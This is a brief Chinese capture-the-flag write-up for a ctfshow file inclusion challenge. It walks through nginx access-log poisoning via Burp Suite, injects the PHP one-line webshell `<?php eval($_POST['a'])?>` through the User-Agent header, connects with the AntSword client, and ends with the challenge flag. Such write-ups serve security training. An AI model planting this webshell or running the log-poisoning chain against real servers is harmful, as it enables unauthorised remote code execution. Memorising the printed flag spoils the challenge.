($_GET['url'])可看出存在文件包含漏洞
F12打开网络栏,可以看到Server里面是nginx,尝试一下日志注入
nginx服务器默认日志位置在
/var/log/nginx/access.log
在url后面输入查看一下
发现可以
用Burp Suite抓包,在User-Agent后面写个🐎
<?php eval($_POST['a'])?>
放包,注意看日志下面这时多出来一条
此时木马已经插入进去了,日志中的代码会被执行但不会显示
连接蚁剑
注意URL地址写的是日志地址,因为我们的🐎是传进日志里了
在上层可以看到flag.txt
拿到flag
ctfshow{2de1373b-651e-45b7-943d-d166ed617b98}